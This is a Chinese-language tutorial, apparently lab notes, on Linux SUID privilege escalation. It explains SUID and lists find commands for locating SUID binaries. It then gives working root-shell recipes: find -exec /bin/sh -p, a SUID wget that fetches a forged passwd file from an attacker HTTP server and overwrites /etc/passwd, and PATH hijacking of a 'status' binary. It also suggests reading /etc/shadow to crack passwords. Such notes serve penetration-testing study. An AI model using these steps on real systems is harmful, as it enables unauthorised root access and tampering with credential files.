概念:
SUID:当用户执行具有SUID权限的文件时,会以该文件所有者的权限来运行此文件。当s这个标志出现在文件所有者的x权限位时,此时被称为Set UID,简称SUID。
SUID原理:
-
在执行过程中,调用者会以文件所有者的权限去执行
-
该权限只有在该程序执行的时候才有效
SUID前提:
-
具备SUID权限的文件得是二进制可执行文件
-
调用者必须具备该文件的可执行权限(x)
# 查找具有SUID权限的文件,且该文件的拥有者是root
find / -perm -4000 -print 2>/dev/null | xargs ls -al
find / -perm -u=s -type f 2>/dev/null | xargs ls -al
# 查看当前shell的编号
echo $$
利用方式:
-
能读取文件内容,那查看
/etc/shadow
关键的配置文件,尝试爆破密码 -
能修改文件内容,修改
/etc/passwd
之类的配置文件 -
能执行命令,直接
/bin/sh -ip
获取一个具备root权限的shell
注意:(具备SUID权限的命令,在执行其他命令的时候,如果不是直接去运行命令对应的文件(如:find -> /usr/bin/find),而是调用/bin/sh -c
去执行命令的话,那么不能用于提权)
参考链接:
案例:
1、find
查看权限
find / -perm -u=s -type f 2>/dev/null | xargs ls -al
提权
which find
/usr/bin/find -exec /bin/sh -p \; -quit
2、wget
查看权限
find / -perm -u=s -type f 2>/dev/null | xargs ls -al
passwd权限
如果可读,将其下载下来,做备份
cat /etc/passwd
伪造用户
openssl passwd -1 -salt Coke Coke123
参数 | 作用 |
-1 | -1(数字):基于MD5的算法代号。 |
-salt | 加密时加点盐,可以增加算法的复杂度。 |
(shadow更习惯用mkpasswd,passwd更习惯用openssl)
追加用户
覆盖passwd
攻击机:192.168.74.128
开启HTTP服务
python -m http.server 8000
受害机:192.168.74.129
wget下载并覆盖/etc/passwd
cd /tmp
wget http://192.168.74.128:8000/passwd -O /etc/passwd
提权
切换用户
su Coke
3、status
没有现成环境,就以靶机为例
查看权限
find / -perm -u=s -type f 2>/dev/null | xargs ls -al
将其下载下来,并扔IDA里来反编译
攻击机下载
scp jose@172.16.33.92:/usr/bin/status /opt
反编译
提权过程
status运用了service程序,调用过程中没有使用绝对路径,可以自定义service加到环境变量中以获得提权效果
cd /tmp
echo "/bin/bash" > service
chmod 777 ./service
export PATH=/tmp:$PATH
status
并不是标准的SUID提权,类似于环境变量劫持和SUID的结合